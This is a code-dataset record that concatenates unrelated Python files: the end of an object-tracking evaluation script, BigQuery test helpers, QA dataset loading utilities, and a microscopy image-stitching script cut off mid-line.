num_objs = len(df_groupedby_obj)\n mean_errors_offline = df_groupedby_obj.error_offline.mean()\n median_errors_offline = df_groupedby_obj.error_offline.median()\n mean_errors_online = df_groupedby_obj.error_online.mean()\n median_errors_online = df_groupedby_obj.error_online.median()\n obj_summary = {}\n obj_summary[\"num-objs\"] = num_objs\n offline_summary = {}\n offline_summary[\"mean-of-mean\"] = float(mean_errors_offline.mean())\n offline_summary[\"median-of-mean\"] = float(mean_errors_offline.median())\n offline_summary[\"mean-of-median\"] = float(median_errors_offline.mean())\n offline_summary[\"median-of-median\"] = 
float(median_errors_offline.median())\n offline_summary[\"mean-error-lt-10\"] = float((mean_errors_offline < 10).sum())\n offline_summary[\"mean-error-lt-5\"] = float((mean_errors_offline < 5).sum())\n offline_summary[\"mean-error-lt-3\"] = float((mean_errors_offline < 3).sum())\n offline_summary[\"mean-error-lt-1\"] = float((mean_errors_offline < 1).sum())\n offline_summary[\"median-error-lt-10\"] = float((median_errors_offline < 10).sum())\n offline_summary[\"median-error-lt-5\"] = float((median_errors_offline < 5).sum())\n offline_summary[\"median-error-lt-3\"] = float((median_errors_offline < 3).sum())\n offline_summary[\"median-error-lt-1\"] = float((median_errors_offline < 1).sum())\n obj_summary[\"offline\"] = offline_summary\n online_summary = {}\n online_summary[\"mean-of-mean\"] = float(mean_errors_online.mean())\n online_summary[\"median-of-mean\"] = float(mean_errors_online.median())\n online_summary[\"mean-of-median\"] = float(median_errors_online.mean())\n online_summary[\"median-of-median\"] = float(median_errors_online.median())\n online_summary[\"mean-error-lt-10\"] = float((mean_errors_online < 10).sum())\n online_summary[\"mean-error-lt-5\"] = float((mean_errors_online < 5).sum())\n online_summary[\"mean-error-lt-3\"] = float((mean_errors_online < 3).sum())\n online_summary[\"mean-error-lt-1\"] = float((mean_errors_online < 1).sum())\n online_summary[\"median-error-lt-10\"] = float((median_errors_online < 10).sum())\n online_summary[\"median-error-lt-5\"] = float((median_errors_online < 5).sum())\n online_summary[\"median-error-lt-3\"] = float((median_errors_online < 3).sum())\n online_summary[\"median-error-lt-1\"] = float((median_errors_online < 1).sum())\n obj_summary[\"online\"] = online_summary\n\n if summarize_best_worst:\n best_worst = _summarize_best_worst(\n df,\n group=[\"scene\", \"object_id\", \"obj_class\"],\n summarize_item=_get_obj_summary,\n )\n obj_summary.update(best_worst)\n return obj_summary\n\n\ndef _get_scene_summary(df, scene_row):\n scene, error_offline = scene_row\n df_scene = df[df.scene == scene]\n num_frames_total = len(df_scene)\n num_objects = len(df_scene.object_id.unique())\n max_error_offline = float(df_scene.error_offline.max())\n min_error_offline = float(df_scene.error_offline.min())\n max_error_online = float(df_scene.error_online.max())\n min_error_online = float(df_scene.error_online.min())\n return {\n \"scene\": scene,\n \"error_offline\": error_offline,\n \"num_frames\": num_frames_total,\n \"num_objects\": num_objects,\n \"max_error_offline\": max_error_offline,\n \"min_error_offline\": min_error_offline,\n \"max_error_online\": max_error_online,\n \"min_error_online\": min_error_online,\n }\n\n\ndef _get_obj_summary(df, obj):\n scene, obj_id, obj_class = obj[0]\n error_offline = obj[1]\n df_obj = df.loc[(df.scene == scene) & (df.object_id == obj_id)]\n num_frames_total = len(df_obj)\n try:\n tracked_ratio = float(df_obj.tracked.sum() / num_frames_total)\n except AttributeError:\n tracked_ratio = \"NA\"\n df_fully_visible = df_obj.loc[(df.truncation_lvl == 0) & (df.occlusion_lvl == 0)]\n fully_visible_ratio = len(df_fully_visible) / num_frames_total\n min_dist_from_cam = float(df_obj.distance.min())\n max_dist_from_cam = float(df_obj.distance.max())\n return {\n \"scene\": scene,\n \"object_id\": obj_id,\n \"class\": obj_class,\n \"error_offline\": error_offline,\n \"num_frames\": num_frames_total,\n \"tracked_ratio\": tracked_ratio,\n \"fully_visible_ratio\": fully_visible_ratio,\n \"min_dist\": min_dist_from_cam,\n 
\"max_dist\": max_dist_from_cam,\n }\n\n\ndef _get_metrics(df):\n metrics = {}\n errors_offline = {}\n errors_offline[\"mean\"] = float(df.error_offline.mean())\n errors_offline[\"median\"] = float(df.error_offline.median())\n errors_offline[\"stddev\"] = float(df.error_offline.std())\n errors_online = {}\n errors_online[\"mean\"] = float(df.error_online.mean())\n errors_online[\"median\"] = float(df.error_online.median())\n errors_online[\"stddev\"] = float(df.error_online.std())\n metrics[\"offline\"] = errors_offline\n metrics[\"online\"] = errors_online\n if df.empty:\n metrics[\"tracked_ratio\"] = \"NA\"\n else:\n try:\n metrics[\"tracked_ratio\"] = float(df.tracked.sum() / len(df))\n except AttributeError:\n metrics[\"tracked_ratio\"] = \"NA\"\n return metrics\n\n\ndef _create_report(df, dst_dir, save):\n if save:\n csv_dir = dst_dir / \"csv\"\n csv_dir.mkdir(exist_ok=True)\n df.to_csv((csv_dir / \"full.csv\").as_posix())\n report = {}\n print(\"Creating overall summary...\")\n report[\"summary\"] = _summarize_df(df)\n print(\"Created!\")\n per_scene_report = {}\n report[\"per-scene\"] = _summarize_best_worst(\n df, group=[\"scene\"], summarize_item=_get_scene_summary\n )\n for scene in sorted(df.scene.unique()):\n print(f\"Creating summary for scene {scene}\")\n scene_df = df[df.scene == scene]\n per_scene_report[scene] = _summarize_df(scene_df)\n print(\"Created!\")\n report[\"per-scene\"].update(per_scene_report)\n\n if save:\n print(\"Saving report\")\n with open(dst_dir / \"report.yaml\", \"w\") as fp:\n yaml.dump(report, fp, sort_keys=False)\n else:\n pprint(report)\n print(\"Finished report!\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\n \"input\",\n help=\"The evaluation directory containing an `evaluation.csv` file for all scenes\",\n )\n parser.add_argument(\n \"-s\", \"--save\", dest=\"save\", action=\"store_true\", help=\"Whether to save plots\"\n )\n\n args = parser.parse_args()\n src_dir = Path(args.input)\n df = None\n full_mot_metrics = MOTMetrics()\n for scene_dir in src_dir.iterdir():\n if scene_dir.is_file():\n continue\n eval_file = scene_dir / \"evaluation.csv\"\n if not eval_file.exists():\n continue\n mot_metrics_file = scene_dir / \"mot_metrics.json\"\n with open(mot_metrics_file, \"r\") as fp:\n scene_mot_metrics = MOTMetrics(**json.load(fp))\n full_mot_metrics.mostly_lost += scene_mot_metrics.mostly_lost\n full_mot_metrics.mostly_tracked += scene_mot_metrics.mostly_tracked\n full_mot_metrics.partly_tracked += scene_mot_metrics.partly_tracked\n full_mot_metrics.true_positives += scene_mot_metrics.true_positives\n full_mot_metrics.false_positives += scene_mot_metrics.false_positives\n full_mot_metrics.false_negatives += scene_mot_metrics.false_negatives\n\n scene_df = pd.read_csv(eval_file.as_posix())\n # for backward compatibility\n scene_df.rename(\n columns={\n \"occlusion level\": \"occlusion_lvl\",\n \"truncation level\": \"truncation_lvl\",\n \"object id\": \"object_id\",\n \"image id\": \"image_id\",\n \"distance from camera\": \"distance\",\n },\n inplace=True,\n )\n\n scene_df.insert(0, \"scene\", scene_dir.name)\n if df is None:\n df = scene_df\n else:\n df = pd.concat([df, scene_df], ignore_index=True)\n dst_dir = src_dir / \"full_eval\"\n dst_dir.mkdir(exist_ok=True)\n # PLOTS\n # histogram of errors\n _create_report(df, dst_dir, args.save)\n _plt_hist(df, dst_dir, args.save)\n _plt_hist_no_outliers(df, dst_dir, args.save)\n full_mot_metrics.precision = 
full_mot_metrics.true_positives / (\n full_mot_metrics.true_positives + full_mot_metrics.false_positives\n )\n full_mot_metrics.recall = full_mot_metrics.true_positives / (\n full_mot_metrics.true_positives + full_mot_metrics.false_negatives\n )\n full_mot_metrics.f1 = (2 * full_mot_metrics.precision * full_mot_metrics.recall) / (\n full_mot_metrics.precision + full_mot_metrics.recall\n )\n full_mot_metrics_fname = dst_dir / \"mot_metrics.json\"\n with open(full_mot_metrics_fname, \"w\") as fp:\n json.dump(full_mot_metrics.__dict__, fp, indent=4)\n # _plt_error_by_dist(df, dst_dir, args.save)\n # histogram of errors w/o outliers\n # errors vs distance\n", "repo_name": "AnselmC/bamot", "sub_path": "scripts/full_evaluation.py", "file_name": "full_evaluation.py", "file_ext": "py", "file_size_in_byte": 17724, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.xlabel", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "itertools.cycle", "line_number": 76, "usage_type": "call"}, {"api_name": "itertools.cycle", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm.Spectral", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 77, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "yaml.dump", "line_number": 389, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 391, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 396, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 406, "usage_type": "call"}, {"api_name": "evaluate_trajectories.MOTMetrics", "line_number": 408, "usage_type": "call"}, {"api_name": "evaluate_trajectories.MOTMetrics", "line_number": 417, "usage_type": "call"}, {"api_name": "json.load", "line_number": 417, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 425, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 442, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 461, "usage_type": "call"}]} +{"seq_id": "24499735812", "text": "from google.cloud import bigquery, exceptions\nfrom tests.utils import constants\n\n\ndef get_dataset():\n return constants.bq_client.get_dataset(constants.dataset_id)\n\n\ndef dataset_exists():\n try:\n get_dataset()\n 
return True\n except exceptions.NotFound:\n return False\n\n\ndef delete_dataset():\n constants.bq_client.delete_dataset(\n constants.dataset_id,\n delete_contents=True,\n not_found_ok=True)\n\n\ndef create_dataset():\n dataset = bigquery.Dataset(constants.dataset_id)\n dataset.location = constants.dataset_location\n constants.bq_client.create_dataset(\n dataset=dataset,\n exists_ok=False)\n\n\ndef list_tables():\n tables = list(constants.bq_client.list_tables(constants.dataset_id))\n table_names = sorted([t.table_id for t in tables])\n return table_names\n", "repo_name": "augustin-barillec/bigquery-operator", "sub_path": "tests/utils/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tests.utils.constants.bq_client.get_dataset", "line_number": 6, "usage_type": "call"}, {"api_name": "tests.utils.constants.bq_client", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 6, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_id", "line_number": 6, "usage_type": "attribute"}, {"api_name": "google.cloud.exceptions.NotFound", "line_number": 13, "usage_type": "attribute"}, {"api_name": "google.cloud.exceptions", "line_number": 13, "usage_type": "name"}, {"api_name": "tests.utils.constants.bq_client.delete_dataset", "line_number": 18, "usage_type": "call"}, {"api_name": "tests.utils.constants.bq_client", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 18, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_id", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 19, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.Dataset", "line_number": 25, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 25, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_id", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 25, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_location", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 26, "usage_type": "name"}, {"api_name": "tests.utils.constants.bq_client.create_dataset", "line_number": 27, "usage_type": "call"}, {"api_name": "tests.utils.constants.bq_client", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 27, "usage_type": "name"}, {"api_name": "tests.utils.constants.bq_client.list_tables", "line_number": 33, "usage_type": "call"}, {"api_name": "tests.utils.constants.bq_client", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tests.utils.constants", "line_number": 33, "usage_type": "name"}, {"api_name": "tests.utils.constants.dataset_id", "line_number": 33, "usage_type": "attribute"}]} +{"seq_id": "74149516005", "text": "import json\nimport random\nfrom itertools import chain\nfrom random import sample, shuffle\nimport os\n\nimport nltk\nimport pandas as pd\n\nrandom.seed(42)\n\n\ndef save_result_on_disk(all_df, result_dic, cache_path, dataset_name, method, task):\n folder_dir = os.path.join(cache_path, dataset_name, method)\n print('save file in {}'.format(folder_dir))\n df = pd.concat(all_df)\n if not os.path.isdir(folder_dir):\n os.makedirs(folder_dir)\n\n cache_file = os.path.join(folder_dir, 
method + '.{}.csv'.format(task))\n res_file = os.path.join(folder_dir, method + '.{}.json'.format(task))\n # save rankings\n df.to_csv(cache_file, index=False)\n # save results\n json.dump(result_dic, open(res_file, 'w'), indent=4)\n\n\ndef cache_exist(cache_path, dataset_name, method, task):\n cache_file = os.path.join(cache_path, dataset_name, method, method + '.{}.csv'.format(task))\n if os.path.isfile(cache_file):\n all_df = [t[1] for t in pd.read_csv(cache_file).groupby('chapter')]\n return all_df\n else:\n return []\n\n\ndef pretty_print_results(cache_path, dataset_name, method, task):\n folder_dir = os.path.join(cache_path, dataset_name, method)\n result_file = os.path.join(folder_dir, method + '.{}.json'.format(task))\n all_results = json.load(open(result_file))\n for item in all_results.items():\n print(item)\n\n\ndef read_json_file(file_path):\n with open(file_path) as outfile:\n data = json.load(outfile)\n return data\n\n\ndef _sample_negatives(pos_sample, neg_sample, factor=2):\n \"\"\"A naive negative sampling\"\"\"\n return sample(neg_sample, k=min(len(pos_sample) * factor, len(neg_sample)))\n\n\ndef extract_paragraph_pointwise(train_file_path, dataset_name, split, negative_samples_factor):\n data = read_json_file(train_file_path)\n if dataset_name == 'tqa':\n all_data = []\n for c in data:\n positive_labels = [s['ground_sentence'] for s in c['questions']]\n all_sentences = list(chain(*[nltk.tokenize.sent_tokenize(p) for p in c['chapter_text_list']]))\n negative_labels = [s for s in all_sentences if s not in positive_labels]\n\n pos_para = [(pl, 1) for pl in positive_labels]\n neg_para = [(nl, 0) for nl in negative_labels]\n\n if split == \"train\":\n neg_para = _sample_negatives(pos_para, neg_para, factor=negative_samples_factor)\n # sample(neg_para, k=min(len(pos_para) * 2, len(neg_para)))\n\n all_data.append(pos_para)\n all_data.append(neg_para)\n\n all_data = list(chain(*all_data))\n if split == 'train':\n shuffle(all_data)\n return all_data\n\n elif dataset_name == 'openstax':\n all_data = []\n for c in data:\n positive_labels = []\n for q in c['questions']:\n for aligned_p in q['aligned_paragraphs']:\n if aligned_p.get('annotation'):\n tmp = [item for item in aligned_p['annotation'].items() if item[1][0] != 'no_support']\n if len(tmp) > 0:\n positive_labels.append(aligned_p)\n\n pos_para = set([p['paragraph_num'] for p in positive_labels])\n neg_para = set(list(range(len(c['tokenized_chapter_text'])))).difference(set(pos_para))\n\n pos_txt = [(\" \".join(\" \".join(item) for item in c['tokenized_chapter_text'][pp]), 1) for pp in pos_para]\n neg_txt = [(\" \".join(\" \".join(item) for item in c['tokenized_chapter_text'][pp]), 0) for pp in neg_para]\n if split == 'train':\n if negative_samples_factor != -1:\n neg_txt = _sample_negatives(pos_txt, neg_txt, factor=negative_samples_factor)\n\n all_data.append(pos_txt)\n all_data.append(neg_txt)\n all_data = list(chain(*all_data))\n if split == 'train':\n shuffle(all_data)\n return all_data\n else:\n raise Exception('dataset not found ...')\n", "repo_name": "hadifar/content_selection", "sub_path": "xSQuAD/helper_fn.py", "file_name": "helper_fn.py", "file_ext": "py", "file_size_in_byte": 3996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.seed", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"},
{"api_name": "pandas.concat", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 40, "usage_type": "call"}, {"api_name": "json.load", "line_number": 47, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 53, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.tokenize.sent_tokenize", "line_number": 62, "usage_type": "call"}, {"api_name": "nltk.tokenize", "line_number": 62, "usage_type": "attribute"}, {"api_name": "itertools.chain", "line_number": 75, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 77, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 102, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "27332534372", "text": "'''\nStitch\n- Combine all field images into one image\n'''\n\nimport numpy as np\nimport cv2 as cv\nimport os\n\n\ndef readImages(dataDir): #, wells, positions, channels, timePoints, fields):\n # edit:\n # - take image file format as input. File formats change.\n # - take well layout as e.g. 
(04, 04)\n # - take the number of positions and create a list with names to iterate through\n # - take the number of channels and create a list with names to iterate through\n # - take the number of timePoints and create a list with the names to iterate through\n # - make it so general that the user can add whatever variables they desire (positions, channels, timePoints)\n # and the program would create the list for reading.\n # - or consider if all files should be read, irrespective of the name and organised as they come.\n # the core of the last 2 points is: does the image data need a data structure, or is a list with indexes of the contents?\n # it depends on how the user wants to process the data\n\n '''\n Purpose: To read all files of the imaging experiment\n\n Input:\n - wells = a list of tuples with the well's row and column numbers in text format,\n - positions = an integer quantity of the z positions that each well was imaged at,\n - channels = the number of imaging channels used for the imaging experiment,\n - fields = an integer quantity of the subfields imaged per well.\n\n Output:\n - imgs_all_wells = a nested list of images of each well subdivided by fields, captured at different z\n positions and with different channels (shape = wells x positions x channels x fields)\n '''\n\n\n '''\n 1. Read images in stitching order\n\n '''\n\n # # Stitching order\n # fields_25_stitching_order = ['02', '03', '04', '05', '06',\n # '11', '10', '09', '08', '07',\n # '12', '13', '01', '14', '15',\n # '20', '19', '18', '17', '16',\n # '21', '22', '23', '24', '25' ]\n # fields_25_rows = 5\n #\n # fields_9_stitching_order = ['02', '03', '04',\n # '06', '01', '05',\n # '07', '08', '09']\n #\n # # using positions\n # fields_6_stitching_order = ['02', '01', '03',\n # '06', '05', '04']\n #\n # fields_9_rows = 3\n #\n # if fields == 6:\n # stitching_order = fields_6_stitching_order\n # elif fields == 9:\n # stitching_order = fields_9_stitching_order\n # elif fields == 25:\n # stitching_order = fields_25_stitching_order\n # elif fields == 1:\n # stitching_order = ['01']\n #\n # channel_names = ['1', '2', '3', '4']\n # position_names = ['01', '02', '03', '04', '05',\n # '06', '07', '08', '09', '10',\n # '11', '12', '13', '14', '15']\n # timePoint_names = ['1', '2', '3', '4'] # for however long there are timepoints\n #\n # # Reading images\n # imgs_all_wells = [] # dimensions: wells x positions x channels x time x fields\n #\n # for well in range(len(wells)):\n # # imgs_one_well_all_channels = [] # channels x fields\n # imgs_one_well_all_positions_channels_and_times = [] # dimensions: positions x channels x time x fields\n #\n # for position in range(positions):\n # imgs_one_well_position_all_channels_and_times = [] # dimensions: channels x time x fields\n #\n # for channel in range(channels):\n # imgs_one_channel_all_times_and_fields = [] # dimensions: time x fields\n #\n # for timePoint in range(timePoints):\n # imgs_one_timePoint_all_fields = [] # dimensions: fields\n #\n # for field in range(len(stitching_order)):\n # # cv.IMREAD_GRAYSCALE allows a 16-bit image to remain as 16-bit\n # imgs_one_timePoint_all_fields.append(cv.imread(dir +\n # '/r' + wells[well][0] +\n # 'c' + wells[well][1] +\n # 'f' + stitching_order[field] +\n # 'p' + position_names[position] +\n # '-ch' + channel_names[channel] +\n # 'sk' + timePoint_names[timePoint] +\n # 'fk1fl1.tif', cv.IMREAD_ANYDEPTH))\n # # at the end of each time point\n # imgs_one_channel_all_times_and_fields.append(imgs_one_timePoint_all_fields)\n #\n # # 
at the end of each channel\n # imgs_one_well_position_all_channels_and_times.append(imgs_one_channel_all_times_and_fields)\n #\n # # at the end of each well position\n # imgs_one_well_all_positions_channels_and_times.append(imgs_one_well_position_all_channels_and_times)\n #\n # # at the end of each well\n # imgs_all_wells.append(imgs_one_well_all_positions_channels_and_times)\n\n print(\"\\nReading data...\")\n\n # > Get the names and extensions of the image files in the directory, sort alphabetically\n inputImagesNames = sorted(os.listdir(dataDir))\n\n # > Create directory paths for each image file\n imagePaths = [dataDir + '/' + imageName for imageName in inputImagesNames]\n\n # > Read images\n inputImages = [cv.imread(imagePath, cv.IMREAD_GRAYSCALE) for imagePath in imagePaths]\n\n print(\"Finished reading data.\")\n\n print(\"\\nThere is/are in total \" + str(len(inputImagesNames)) + \" image(s).\")\n\n return inputImages, inputImagesNames\n\n\ndef stitch(unstitched_images, wells, positions, channels, fields):\n '''\n Function: To merge the different subfield images of one well into one image\n\n Input:\n - images_of_all_wells = a nested list of images of each well subdivided by fields, captured at different z\n positions and with different channels (shape = wells x positions x channels x fields),\n - wells = a list of tuples with the well's row and column numbers in text format,\n - positions = an integer quantity of the z positions that each well was imaged at,\n - channels = the number of imaging channels used for the imaging experiment,\n - fields = an integer quantity of the subfields imaged per well.\n\n Output:\n - normalised fields of a well\n '''\n\n \"\"\"\n 25 fields List order = [0, 1, 2, 3, 4,\n 5, 6, 7, 8, 9,\n 10, 11, 12, 13, 14,\n 15, 16, 17, 18, 19,\n 20, 21, 22, 23, 24 ]\n \"\"\"\n\n \"\"\"\n 9 fields List order = [ 0, 1, 2,\n 3, 4, 5,\n 6, 7, 8]\n \"\"\"\n\n stitched_imgs = [] # wells x positions x channels\n\n for well in range(len(wells)):\n stitched_imgs_one_well_all_z_positions_and_channels = [] # positions x channels\n\n for position in range(positions):\n stitched_imgs_at_one_well_position_for_all_channels = [] # channels\n\n for channel in range(channels):\n\n # Stitch columns, then stitch rows\n if fields == 6:\n first_row = np.concatenate((unstitched_images[well][position][channel][0],\n unstitched_images[well][position][channel][1],\n unstitched_images[well][position][channel][2]), axis=1)\n second_row = np.concatenate((unstitched_images[well][position][channel][3],\n unstitched_images[well][position][channel][4],\n unstitched_images[well][position][channel][5]), axis=1)\n\n # at the end of each channel, store the stitched image\n stitched_imgs_at_one_well_position_for_all_channels.append(np.concatenate((first_row, second_row), axis=0))\n\n elif fields == 25:\n first_row = np.concatenate((unstitched_images[well][position][channel][0],\n unstitched_images[well][position][channel][1],\n unstitched_images[well][position][channel][2],\n unstitched_images[well][position][channel][3],\n unstitched_images[well][position][channel][4]), axis=1)\n second_row = np.concatenate((unstitched_images[well][position][channel][5],\n unstitched_images[well][position][channel][6],\n unstitched_images[well][position][channel][7],\n unstitched_images[well][position][channel][8],\n unstitched_images[well][position][channel][9]), axis=1)\n third_row = np.concatenate((unstitched_images[well][position][channel][10],\n unstitched_images[well][position][channel][11],\n 
unstitched_images[well][position][channel][12],\n unstitched_images[well][position][channel][13],\n unstitched_images[well][position][channel][14]), axis=1)\n fourth_row = np.concatenate((unstitched_images[well][position][channel][15],\n unstitched_images[well][position][channel][16],\n unstitched_images[well][position][channel][17],\n unstitched_images[well][position][channel][18],\n unstitched_images[well][position][channel][19]), axis=1)\n fifth_row = np.concatenate((unstitched_images[well][position][channel][20],\n unstitched_images[well][position][channel][21],\n unstitched_images[well][position][channel][22],\n unstitched_images[well][position][channel][23],\n unstitched_images[well][position][channel][24]), axis=1)\n\n # at the end of each channel, store\n stitched_imgs_at_one_well_position_for_all_channels.append(\n np.concatenate((first_row, second_row, third_row, fourth_row, fifth_row), axis=0))\n\n # at the end of each well position, store the 4 channel stitched images\n stitched_imgs_one_well_all_z_positions_and_channels.\\\n append(stitched_imgs_at_one_well_position_for_all_channels)\n\n # at the end of each well\n stitched_imgs.append(stitched_imgs_one_well_all_z_positions_and_channels)\n\n return stitched_imgs\n\n\ndef export_imgs(imgs, dir, wells, channels, positions):\n\n position_names = ['01', '02', '03', '04', '05',\n '06', '07', '08', '09', '10',\n '11', '12', '13', '14', '15']\n\n for well in range(len(wells)):\n for position in range(positions):\n for channel in range(channels):\n # Export\n file_name = '/well-' + str(wells[well]) + '-p' + position_names[position] + '-channel-' + str(channel + 1) + '.png'\n 